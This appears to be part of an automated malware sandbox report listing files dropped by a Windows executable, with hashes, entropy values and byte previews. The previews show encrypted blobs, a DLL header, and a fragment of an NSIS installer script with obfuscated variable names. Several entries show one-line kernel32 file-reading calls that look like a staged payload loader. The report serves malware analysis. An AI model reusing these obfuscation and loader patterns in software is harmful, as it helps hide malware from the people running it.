                                                                Entropy (8bit):3.9637832956585757
                                                                Encrypted:false
                                                                SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                                                MD5:16D513397F3C1F8334E8F3E4FC49828F
                                                                SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                                                SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                                                SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):52
                                                                Entropy (8bit):4.0914493934217315
                                                                Encrypted:false
                                                                SSDEEP:3:sBa99k1NoCFOn:KankVg
                                                                MD5:5D04A35D3950677049C7A0CF17E37125
                                                                SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                                                SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                                                SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                                                Malicious:false
                                                                Reputation:moderate, very likely benign file
                                                                Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):11776
                                                                Entropy (8bit):5.854901984552606
                                                                Encrypted:false
                                                                SSDEEP:192:qPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4U:F7VpNo8gmOyRsVc4
                                                                MD5:0063D48AFE5A0CDC02833145667B6641
                                                                SHA1:E7EB614805D183ECB1127C62DECB1A6BE1B4F7A8
                                                                SHA-256:AC9DFE3B35EA4B8932536ED7406C29A432976B685CC5322F94EF93DF920FEDE7
                                                                SHA-512:71CBBCAEB345E09306E368717EA0503FE8DF485BE2E95200FEBC61BCD8BA74FB4211CD263C232F148C0123F6C6F2E3FD4EA20BDECC4070F5208C35C6920240F0
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: sgJV11UlDP.exe, Detection: malicious, Browse
                                                                • Filename: c56D7_Receipt.vbs, Detection: malicious, Browse
                                                                • Filename: , Detection: malicious, Browse
                                                                • Filename: 5006_2.6.2.exe, Detection: malicious, Browse
                                                                • Filename: ocs-office.exe, Detection: malicious, Browse
                                                                • Filename: jU0hAXFL0k.exe, Detection: malicious, Browse
                                                                • Filename: jU0hAXFL0k.exe, Detection: malicious, Browse
                                                                • Filename: #U4e5d#U6708#U58f0#U660e_40981677.xls, Detection: malicious, Browse
                                                                • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                                • Filename: MaMsKRmgXZ.exe, Detection: malicious, Browse
                                                                Reputation:moderate, very likely benign file
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L......]...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):100766
                                                                Entropy (8bit):4.60805090125263
                                                                Encrypted:false
                                                                SSDEEP:1536:NbCCACwyqugZe9tygI+SjuzpXoCwsY/rs7q5/Kj0:06wyqugZ7gI+SjUZoxnjs7dj0
                                                                MD5:378CA253C3EA95BCE064BB50CF6D9B7B
                                                                SHA1:82BA0A64C26F14B022B6CB0095D75111B5A9F4B1
                                                                SHA-256:EDEFCD83AF9EBB6E6F254C3093ACBC5F87A69EEE3A6E0AD3487EE81139BF1749
                                                                SHA-512:815CF7499AFB757D6FF31F52BC6CC8417CA28D56A71C3493378A3AC310AED293C62409B87C3D595E299FE630157C3BF9C07AA34517A0FC295D580A7675F3CCEC
                                                                Malicious:false
                                                                Preview:......x............:..ll.....oooooo..sss.....................................?............i............%..a.))..............Z.bbb.....R.i........CC...V._......{{.===.....................g.r.......//....AA.........B.................................88888..2.t................PPP..............................................................RR......$$..t.....UUU....K.......e...........XXXXX..........T.................................>............../.............................. ...................j.......llll....%..999......................s.Q.AA.R......ddd.L......................f.............33.........III.&..EEE...))......,...R...........<.............o.kk...........z........................gg..........III..................F.....66..........v...F.t.......T.++.....k..........#.......))......./.`.}}.%%%%%%.......(.....................GG..............QQQ.........................................FF....;;;.................\.ii.....B................. ......i....{{............99........}}......
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):495473
                                                                Entropy (8bit):1.252683728528738
                                                                Encrypted:false
                                                                SSDEEP:1536:29Atz1Dww/YItq3ys1yNe3uRHiOnU2E74SEH:29AtzV/2yFauRHcoH
                                                                MD5:EF47BA5BA9823E8C3469035CF70773D2
                                                                SHA1:21D1961813BA8BABF395C3AFE324487EE355578F
                                                                SHA-256:895776946CC4E8956593C9B8CBA36B3D0523F921C419F2A68C58C82FC5BA8C8B
                                                                SHA-512:E78EA0CA2E615EF745FDE2A8D1FE07F7216E253057805091E0E91A4E7CD780BA8C5E33F2DFA6283104D7A2EED606DEAAE1E82345135CBA914ECAB32B9C5CCF27
                                                                Malicious:false
                                                                Preview:............................................................................................,................................,I..............*..................{.........................................q..............................A.........................................(......X....%..............................................................................................d.B..............................[..............................#.................p..............c............................;.............h.......................7...................................1.....I..................................................a....................................................j...................................................................................................a.......................V.................................{-..........................................[....................................n..................................................|.................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8601
                                                                Entropy (8bit):1.1545164397538636
                                                                Encrypted:false
                                                                SSDEEP:48:zEuB7ok0LmcrzKI9XjvjvGWt/nSz4DP6FIB/IoZt/V:4uBsk0ac1jvqcD6QhV
                                                                MD5:F4A704DD6599AA965F753CF4AFF41544
                                                                SHA1:27F6166A11011BF9340B9477D469A5E39B67CF5B
                                                                SHA-256:689F1C7B21D424488E2F82F5E1CF663D41BE2B8402853953B723F457D91F5C2F
                                                                SHA-512:F2EC79C777CA0349BA727C2292026C83C3CCB0F84C807431A859DB7196248C95E17DFE13EA081F3020BF12F14001D58824F6EE0AEE770DED6BEB7D94E082C082
                                                                Malicious:false
                                                                Preview:...................8..............................$.....................................................>....................'.......................................Y.....................................B........C....X.......................................:.........................................................V.............................................H.....b..............S...........................................................w..........................f..........................................................................................G..............................................P@...................fj........................G..]................................................0......... ..................................................................................................H.......................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):100766
                                                                Entropy (8bit):4.60805090125263
                                                                Encrypted:false
                                                                SSDEEP:1536:NbCCACwyqugZe9tygI+SjuzpXoCwsY/rs7q5/Kj0:06wyqugZ7gI+SjUZoxnjs7dj0
                                                                MD5:378CA253C3EA95BCE064BB50CF6D9B7B
                                                                SHA1:82BA0A64C26F14B022B6CB0095D75111B5A9F4B1
                                                                SHA-256:EDEFCD83AF9EBB6E6F254C3093ACBC5F87A69EEE3A6E0AD3487EE81139BF1749
                                                                SHA-512:815CF7499AFB757D6FF31F52BC6CC8417CA28D56A71C3493378A3AC310AED293C62409B87C3D595E299FE630157C3BF9C07AA34517A0FC295D580A7675F3CCEC
                                                                Malicious:false
                                                                Preview:......x............:..ll.....oooooo..sss.....................................?............i............%..a.))..............Z.bbb.....R.i........CC...V._......{{.===.....................g.r.......//....AA.........B.................................88888..2.t................PPP..............................................................RR......$$..t.....UUU....K.......e...........XXXXX..........T.................................>............../.............................. ...................j.......llll....%..999......................s.Q.AA.R......ddd.L......................f.............33.........III.&..EEE...))......,...R...........<.............o.kk...........z........................gg..........III..................F.....66..........v...F.t.......T.++.....k..........#.......))......./.`.}}.%%%%%%.......(.....................GG..............QQQ.........................................FF....;;;.................\.ii.....B................. ......i....{{............99........}}......
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:PGP Secret Sub-key -
                                                                Category:dropped
                                                                Size (bytes):2097152
                                                                Entropy (8bit):7.999905497796009
                                                                Encrypted:true
                                                                SSDEEP:49152:OKpsKgWBpFkzf6Pe4OU0IIdZgKjxas7VcGzyCj+Y2a8N7XGvBq/:1psZGol4OU0HTVHzyCj+7BN72vBq/
                                                                MD5:9DFBEE307FA56AC84912B5744E8363C5
                                                                SHA1:DCE2BA9DE54AE3C748FDE2F879160C2FE495B726
                                                                SHA-256:C269CC2E768FE7BDF34BC5CCEED86644E80FAC2454B2AFD066B6B1F6DD2CC1EF
                                                                SHA-512:F65169D3201C7419105F4275BFE15BD18E24ED60CB3A5E602C163751E240CBBAEC862DB5DC79EADE1220372E193EF2F17C83AC9DDE8289C0BBE4E1116E13FA46
                                                                Malicious:false
                                                                Preview:.L.i\...tQ.4.A......_...OW...E....z.....T`E../..G.:.K..q.R...5..>...;Zo.I).&.]Q.....W.:....~l..39...z...5.+w...!-D!.._+...X..-%....[......q.d..F.yTP.....V(:.\.l....z...'.EN..e..K.v..%9Z0{*|J2....P....2.Z;.....Q...C..i..}....[t.3P]<..D.+C.._...'q........4.....i..".....X.4..rP.....B.y.ea..H.............iEK...P......2...R....G!.{?....,.o.....j....H.h..L: ..O.;g.A....h.....<.%........Lw./p......lg....U......e.f......D.....N......s.......7..2....gS..+}.....tsE...s~..~.....W.x..I;H.....9..l{7..k..&.....L53z..'"{.#.j..+....%....:[.........BTM5..>hk.XfID.G......^e....Si..e.J..3...N.......aP.Cx.l.L>.U..+....K0..D'.W .Sm........S.2kW&b..K...m. ?4.q.").A.g.6....{.".2......X....3...&C..;].%._.A.4.P.F...6Y....y:4G.. '#.c....a.6M.......l..,..7F.].=.L%.X...g...\.@.U..vGlz'...l...5;..b.3.|.k......,......?.u.L..U.Y...k.S..i.@T.+.&.=..j4.x....+....$../.8S...)N.g..*.rL..m...c....e.5....+a\.x......C..$00...Lx.}z.R.uHJ....a..Z.S $....|Z.k.%U.C <.)..
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):495473
                                                                Entropy (8bit):1.252683728528738
                                                                Encrypted:false
                                                                SSDEEP:1536:29Atz1Dww/YItq3ys1yNe3uRHiOnU2E74SEH:29AtzV/2yFauRHcoH
                                                                MD5:EF47BA5BA9823E8C3469035CF70773D2
                                                                SHA1:21D1961813BA8BABF395C3AFE324487EE355578F
                                                                SHA-256:895776946CC4E8956593C9B8CBA36B3D0523F921C419F2A68C58C82FC5BA8C8B
                                                                SHA-512:E78EA0CA2E615EF745FDE2A8D1FE07F7216E253057805091E0E91A4E7CD780BA8C5E33F2DFA6283104D7A2EED606DEAAE1E82345135CBA914ECAB32B9C5CCF27
                                                                Malicious:false
                                                                Preview:............................................................................................,................................,I..............*..................{.........................................q..............................A.........................................(......X....%..............................................................................................d.B..............................[..............................#.................p..............c............................;.............h.......................7...................................1.....I..................................................a....................................................j...................................................................................................a.......................V.................................{-..........................................[....................................n..................................................|.................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):8601
                                                                Entropy (8bit):1.1545164397538636
                                                                Encrypted:false
                                                                SSDEEP:48:zEuB7ok0LmcrzKI9XjvjvGWt/nSz4DP6FIB/IoZt/V:4uBsk0ac1jvqcD6QhV
                                                                MD5:F4A704DD6599AA965F753CF4AFF41544
                                                                SHA1:27F6166A11011BF9340B9477D469A5E39B67CF5B
                                                                SHA-256:689F1C7B21D424488E2F82F5E1CF663D41BE2B8402853953B723F457D91F5C2F
                                                                SHA-512:F2EC79C777CA0349BA727C2292026C83C3CCB0F84C807431A859DB7196248C95E17DFE13EA081F3020BF12F14001D58824F6EE0AEE770DED6BEB7D94E082C082
                                                                Malicious:false
                                                                Preview:...................8..............................$.....................................................>....................'.......................................Y.....................................B........C....X.......................................:.........................................................V.............................................H.....b..............S...........................................................w..........................f..........................................................................................G..............................................P@...................fj........................G..]................................................0......... ..................................................................................................H.......................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):225561
                                                                Entropy (8bit):1.2509602063831964
                                                                Encrypted:false
                                                                SSDEEP:768:vodpoBR9G/El4UjO+zHLgOWJmrzfhDM2QY2RSbSL8nMzcUqbFuPYVTmTy2MekyEc:W2pzkDkzfhAtNbKANtv4U
                                                                MD5:6865DE99FA19A6862DF5C404DE274F27
                                                                SHA1:4EFBD7E416C513C7B2516052EFD42DB502306C35
                                                                SHA-256:3921ED66814A1199A488E44FDD72C224D4AD9505F3EA9D111E046704B37483B3
                                                                SHA-512:F46BDCB2A29BA7ECD780C181230E573D3D0D7C55BFC06CAD641FA764F90068AFB6A3F7FC14AF1BA725A168EF212CBA93F6530FE7C0D0EE0C78B5A5B729F41B3D
                                                                Malicious:false
                                                                Preview:......................................................."...............+...........).....................................(.....................................................................W.................................. M...............................a.1................r.......................................................................................:..B.............._......U................./........................7.......................................y......................................S...)........................................................n..........(..........x...e......>..............................:........8..................................q.........................................................z..............Y..i............................................2.........f...............................................................................T........................................................v...........5....................................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):406185
                                                                Entropy (8bit):7.094898375766347
                                                                Encrypted:false
                                                                SSDEEP:6144:PuQjFDMjr4I88sZ8g3zg8CIRgDIAsH23zAxB6CGQ5IH6k0B4H8cMeWq/:9jxIJI3zuSSDAn6CGqIH6HBeWk
                                                                MD5:EDCB191EC3A9CF0DC9BC8ED381C5CAAF
                                                                SHA1:80A5D8F2AE9017263EF50BAD71504D1C96526F91
                                                                SHA-256:7681DA5A05E9A04207C6861FDF19A758F7FE5608BEC05B2A420FBEED61816CDE
                                                                SHA-512:D93EF198E99ADC5972D2534D25C3D7237058F2A5BA73B81C6E4A44F48B7BC76A6E69F8A6591F2344A6467E2DA7132C6ABB82A62DA9D4F3ED917EEA12437C9E1A
                                                                Malicious:false
                                                                Preview:....777..((((.J.AA..cc.).6..............B.D.<<................U.................EE.......gg........,,.jjj.............v....................o..........6.....||.......x.A.:.......W.D................E......```..`.....................................h.`...................................._.......X.......h...........LL..............F....```.......GG...............t.........j.jjjjj.5............r..EE............LL.9.............-.22..............1..h...............M......ee....AA...........{{{{...........(................{..:::..}}..........GG....TTT.....UUUUU.r....f............I................VV..mmm...............................444.......??.................................... ........................l.JJ....)...................##.......................X..............u....w....333333...........MM.222................................................................cc...............u.GGGGG.........u..........."..U..XX..............:.....dd....CC.........2..................................~..
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):56731
                                                                Entropy (8bit):1.2442160585209034
                                                                Encrypted:false
                                                                SSDEEP:384:6tYghFWWJicOfl9hdYo9Gvdjh1rjjKlsru8a/3FPzYnaIgapZvHcFe/0C2vqW8IP:NyJicyhlodh1jKlP/3FcRseqD
                                                                MD5:BCA0C962216D9B512E1FEE1F72EBA35B
                                                                SHA1:FF228246A15FA291474DF13F96C51A6BBE03FDBE
                                                                SHA-256:9207608EB008266B5F27EFAF786A1B6D2C4B611F484F62B5FF31D764C0225923
                                                                SHA-512:848BEBCE00D0968884AC1A54BC220DA34FADAA072F403434741DFC3F9843EB3848864184F1F38DAEB013CE0BFEE1BDC09679E80F2EAB9C8CC67ABA3816E0548A
                                                                Malicious:false
                                                                Preview:6.~........................................................E...............................x...............................................-...................}..............................O....k..............................................................X..................................).......Y...7.....................W......................................c...................................................................\....................0....................................4............~.........................................................................................Z...............................................W..............................p................I....R.............................9........................%............................................................."\.....................n......8................................C...............................................................b..............u..........................W.................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):44084
                                                                Entropy (8bit):1.251987965137089
                                                                Encrypted:false
                                                                SSDEEP:384:H5J4r26NPfk3R0omoj53ZOmVFPACwEygLw6:b4igfY3wEy9
                                                                MD5:8E1ECD1CAD1A69BA46F3589D3EE05FCD
                                                                SHA1:511FE3218234DFD061C85834E32694D500A2D8CA
                                                                SHA-256:027B544D8E1F0A9CC480B455943CDB8B7F2E1E6FE64FA4E84C5FB22F58E75534
                                                                SHA-512:D4E8D21B29799A2FD6AA6B254B0E5F1E212F2CEFF6244D3AE1641F460A88FD39EC32AB04E3787BE6C313ABC85B76A2ECC90FA697C58B9899AEE59B16452D98F7
                                                                Malicious:false
                                                                Preview:....................................................................................................................g.....................t...................)...}..............................................................................................................O.f...............................r................................S...U................:........................................2................................................................7........................."....c.........-..........................>.........................j...........h...............................G2......P.......................qd.......................................................................................................................................\........................7.....................O..T;...LK.......j.........................................................Y..........................J...........................................................................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:Targa image data - Map 32 x 10414 x 1 +1
                                                                Category:dropped
                                                                Size (bytes):669932
                                                                Entropy (8bit):5.5314845590929895
                                                                Encrypted:false
                                                                SSDEEP:6144:gKk30jClLCugYQs0Om0TmZi6ZYMdCZcZtaW22ibSd4MoX1DXI5nR9mx2KdQJf6mC:ghdCugMm0TWNIJpbIu945c2iAWeO
                                                                MD5:43AB379A4F5EB535BEEFA8769D0F145C
                                                                SHA1:B5BEDA93EDAB6D45FC87C74406F28575AE3BA633
                                                                SHA-256:E35EFD069097EFCED37EB9A320F9D1519558C61B3C6B606E659A28B0432ADF35
                                                                SHA-512:27B864E0C981CBC385505AB031A5BF245F8DA6588A7762447305A72E8513F904A4509EB104E6A75EB279D364EF853B936405E3B12C6F63082CB2F33D674826A0
                                                                Malicious:false
                                                                Preview:............ ..(............ .(...lI..``.... ......Y..HH.... ..T......@@.... .(B...,..00.... ..%..l... .... ............... ............... .h....0...PNG........IHDR.............\r.f.. .IDATx....5.q..<U..v....-..9..EQ"...$/..."..$N$'.....X.. .#....H.......$....!PdY....,.Cz.....s.....}..J......o....>...z.*.J..J..J..J..J..J..J..J..J..J..J..J>..G..../O..j*..............%...0i....4..S.v.nyW....K...\.;....,^.p.rqV5.....Z..e..R.6.P`4..[2.4..).N.TPT8... ...T.EEr..E.n.}..+.............:...|..m.M.y...E.3}....q...#...L.@..#....h.0...E.F(......F".b......iP..I.R.JF.BP.....~.b..h.9...~......+..-&.{...4,V......g.c.y..^v.......'.*...Y..Q.x.Y.4.........Q.m.....WQ.'. .K9.b..D.S.<X.}^.......s.axY...........,W..[@..>...."&..i..>.'}.T.oOV...U...BZ.QL`$....x.U}..U....m0#w...@3..pD..)...X...Jz.s...K...E./.k..t..._...O.-W...*..s^q..6.._r.).?........0$.eS.*2h.R.i....UkGm.5.F..j..0......Oo.3.A..".Z1.IA,bw.d....F.T....."."........O.}.....w.........;$.w...)..)...9.>.....
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):7049
                                                                Entropy (8bit):5.427889010283913
                                                                Encrypted:false
                                                                SSDEEP:192:tVcb400g8jt9vE3Udc0OctTnJ6Bw2uYcJIt:tLNnskKFctTnszcJw
                                                                MD5:96263BC3F25CD2A239A1242E344FAEBD
                                                                SHA1:1A71FBC9456836750FEE1ADF87A2EF037344716D
                                                                SHA-256:551FA2D5828E69144048B3E0F0582C992A8E5A2E74D68C0DD3A1BD5AC697330B
                                                                SHA-512:5E58804079FD246C8D5005B666BA5FEE853424B34EA1423C6110F1A098CF3DF2793D6CF2430E952460FF1D5A10812BB5FB707E5F6FA9D1226B363703234F6BEB
                                                                Malicious:false
                                                                Preview:!include "MUI2.nsh"..VIAddVersionKey "ProductName" ""..VIAddVersionKey "Comments" ""..VIAddVersionKey "CompanyName" ""..VIAddVersionKey "LegalTrademarks" ""..VIAddVersionKey "LegalCopyright" ""..VIAddVersionKey "FileDescription" ""..VIAddVersionKey "FileVersion" "1.0.0.0"..VIProductVersion "1.0.0.0"....;@@@@@@@@@@@@@@@@@@ DECLARED VAR @@@@@@@@@@@@@@@@@@..Var Carpooldristighedsemanu83..Var udfrdigedesforkarlesl..Var stemmekvgsjapaneserysep..Var Nonviralanthroxanicvejvse..Var morogennemsnitsalderennor..Var kathinatrvlendesminid..Var uidentificerbarh..Var andelsmejerierskge..Var gloseretblondhvernesc..Var stiftamtmandenc..Var affyretristachyou..Var cementalykkeopfat..Var opereredescroce..Var perturbationalh..Var flyttelsopskringmulslet..Var chromatoscopebewailsb..Var snorkeledbryggerkarreness..Var uidentificerbar..;@@@@@@@@@@@@@@@@@@ DECLARED VAR @@@@@@@@@@@@@@@@@@....;!define MUI_ICON icona.ico....SetCompressor BZIP2....; The name of the installer....Name "Frigatoon"....; The fil
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):213163
                                                                Entropy (8bit):1.2509035420987697
                                                                Encrypted:false
                                                                SSDEEP:768:E6Ak6TqKI8qNenRhDkU13nK/Owzmzj63GMIrCDVOAqiVyycSsOR2D+uFFO8ukH1m:a/TnkUFupj/vM9PV
                                                                MD5:98B0761197297AB236BC284E2B596C55
                                                                SHA1:D84B6FCBC7822AC3617AF2E06807F24B6CB09501
                                                                SHA-256:1B09158404A448B8B8DA21415D6D3FF844658BF441B5A5FB4C651B2B1F5F5809
                                                                SHA-512:6AB83D66E4E5874688F7A64C133EF3514CE355936CD66895EFE8249E316E2C87195B82FF4E7780180BA3B58C097196AA58736BA6A9365CC36943C6AC8D78A71D
                                                                Malicious:false
                                                                Preview:.....................D............................................................................&................................l..................................................................................................s.q....s...........................Z...........................................................................................................................................................................................................................6..............u................/.............................................................................................................................a...............7.............T.................0........................................L........~........................s..........................P..........................................................................................................................*............O.............s..................f....................J...............H
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):380
                                                                Entropy (8bit):4.150391372844806
                                                                Encrypted:false
                                                                SSDEEP:6:jKYlGRpzKVqXB++DC6XBRuN6kgrRmXLY8bOraYKFSX6WlWfHcSTQX97Mm2CXmVyg:mYsDmVqXBpC6XnDk+wXcj5KFSk+X97xE
                                                                MD5:DCEB38A26FFEAB28D24D304205DD1CFD
                                                                SHA1:7C3CD56A0E4A2A768D14EA41D88D163C8A3E66DD
                                                                SHA-256:68F09ACCAE0DF5988DF3AACFFF32C8025F07A266367AD77E1614814B2A05C98F
                                                                SHA-512:27469F330E5F57D253084536619CAED2F220CC1AAB74B476C175FAA24467301BA0DD1CC52E9F2F15B5052F0CFC397A4C95B7147C7BD6369ECACD7319FF2BCAE5
                                                                Malicious:false
                                                                Preview:bulletinernes rallinae tace frdselstavles.tilgangstiden fiskeriinspektionen balder udfoerselstilladelse jaconet besttelsesmagt.leptochlorite ubestridte slatternes saddel nishiki vognmandsforretningers..citronsafters thermocauteries bractless svejshundenes sindet apostates involve.sparringpartners morkin sheller bananivorous pensionistkortets.blackguard trylleslagenes smrsyrens,
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):213163
                                                                Entropy (8bit):1.2509035420987697
                                                                Encrypted:false
                                                                SSDEEP:768:E6Ak6TqKI8qNenRhDkU13nK/Owzmzj63GMIrCDVOAqiVyycSsOR2D+uFFO8ukH1m:a/TnkUFupj/vM9PV
                                                                MD5:98B0761197297AB236BC284E2B596C55
                                                                SHA1:D84B6FCBC7822AC3617AF2E06807F24B6CB09501
                                                                SHA-256:1B09158404A448B8B8DA21415D6D3FF844658BF441B5A5FB4C651B2B1F5F5809
                                                                SHA-512:6AB83D66E4E5874688F7A64C133EF3514CE355936CD66895EFE8249E316E2C87195B82FF4E7780180BA3B58C097196AA58736BA6A9365CC36943C6AC8D78A71D
                                                                Malicious:false
                                                                Preview:.....................D............................................................................&................................l..................................................................................................s.q....s...........................Z...........................................................................................................................................................................................................................6..............u................/.............................................................................................................................a...............7.............T.................0........................................L........~........................s..........................P..........................................................................................................................*............O.............s..................f....................J...............H
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):380
                                                                Entropy (8bit):4.150391372844806
                                                                Encrypted:false
                                                                SSDEEP:6:jKYlGRpzKVqXB++DC6XBRuN6kgrRmXLY8bOraYKFSX6WlWfHcSTQX97Mm2CXmVyg:mYsDmVqXBpC6XnDk+wXcj5KFSk+X97xE
                                                                MD5:DCEB38A26FFEAB28D24D304205DD1CFD
                                                                SHA1:7C3CD56A0E4A2A768D14EA41D88D163C8A3E66DD
                                                                SHA-256:68F09ACCAE0DF5988DF3AACFFF32C8025F07A266367AD77E1614814B2A05C98F
                                                                SHA-512:27469F330E5F57D253084536619CAED2F220CC1AAB74B476C175FAA24467301BA0DD1CC52E9F2F15B5052F0CFC397A4C95B7147C7BD6369ECACD7319FF2BCAE5
                                                                Malicious:false
                                                                Preview:bulletinernes rallinae tace frdselstavles.tilgangstiden fiskeriinspektionen balder udfoerselstilladelse jaconet besttelsesmagt.leptochlorite ubestridte slatternes saddel nishiki vognmandsforretningers..citronsafters thermocauteries bractless svejshundenes sindet apostates involve.sparringpartners morkin sheller bananivorous pensionistkortets.blackguard trylleslagenes smrsyrens,
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):225561
                                                                Entropy (8bit):1.2509602063831964
                                                                Encrypted:false
                                                                SSDEEP:768:vodpoBR9G/El4UjO+zHLgOWJmrzfhDM2QY2RSbSL8nMzcUqbFuPYVTmTy2MekyEc:W2pzkDkzfhAtNbKANtv4U
                                                                MD5:6865DE99FA19A6862DF5C404DE274F27
                                                                SHA1:4EFBD7E416C513C7B2516052EFD42DB502306C35
                                                                SHA-256:3921ED66814A1199A488E44FDD72C224D4AD9505F3EA9D111E046704B37483B3
                                                                SHA-512:F46BDCB2A29BA7ECD780C181230E573D3D0D7C55BFC06CAD641FA764F90068AFB6A3F7FC14AF1BA725A168EF212CBA93F6530FE7C0D0EE0C78B5A5B729F41B3D
                                                                Malicious:false
                                                                Preview:......................................................."...............+...........).....................................(.....................................................................W.................................. M...............................a.1................r.......................................................................................:..B.............._......U................./........................7.......................................y......................................S...)........................................................n..........(..........x...e......>..............................:........8..................................q.........................................................z..............Y..i............................................2.........f...............................................................................T........................................................v...........5....................................
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):406185
                                                                Entropy (8bit):7.094898375766347
                                                                Encrypted:false
                                                                SSDEEP:6144:PuQjFDMjr4I88sZ8g3zg8CIRgDIAsH23zAxB6CGQ5IH6k0B4H8cMeWq/:9jxIJI3zuSSDAn6CGqIH6HBeWk
                                                                MD5:EDCB191EC3A9CF0DC9BC8ED381C5CAAF
                                                                SHA1:80A5D8F2AE9017263EF50BAD71504D1C96526F91
                                                                SHA-256:7681DA5A05E9A04207C6861FDF19A758F7FE5608BEC05B2A420FBEED61816CDE
                                                                SHA-512:D93EF198E99ADC5972D2534D25C3D7237058F2A5BA73B81C6E4A44F48B7BC76A6E69F8A6591F2344A6467E2DA7132C6ABB82A62DA9D4F3ED917EEA12437C9E1A
                                                                Malicious:false
                                                                Preview:....777..((((.J.AA..cc.).6..............B.D.<<................U.................EE.......gg........,,.jjj.............v....................o..........6.....||.......x.A.:.......W.D................E......```..`.....................................h.`...................................._.......X.......h...........LL..............F....```.......GG...............t.........j.jjjjj.5............r..EE............LL.9.............-.22..............1..h...............M......ee....AA...........{{{{...........(................{..:::..}}..........GG....TTT.....UUUUU.r....f............I................VV..mmm...............................444.......??.................................... ........................l.JJ....)...................##.......................X..............u....w....333333...........MM.222................................................................cc...............u.GGGGG.........u..........."..U..XX..............:.....dd....CC.........2..................................~..
                                                                Process:C:\Users\user\Desktop\H33UCslPzv.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):56731
                                                                Entropy (8bit):1.2442160585209034
                                                                Encrypted:false
                                                                SSDEEP:384:6tYghFWWJicOfl9hdYo9Gvdjh1rjjKlsru8a/3FPzYnaIgapZvHcFe/0C2vqW8IP:NyJicyhlodh1jKlP/3FcRseqD
                                                                MD5:BCA0C962216D9B512E1FEE1F72EBA35B
                                                                SHA1:FF228246A15FA291474DF13F96C51A6BBE03FDBE
                                                                SHA-256:9207608EB008266B5F27EFAF786A1B6D2C4B611F484F62B5FF31D764C0225923
                                                                SHA-512:848BEBCE00D0968884AC1A54BC220DA34FADAA072F403434741DFC3F9843EB3848864184F1F38DAEB013CE0BFEE1BDC09679E80F2EAB9C8CC67ABA3816E0548A
                                                                Malicious:false
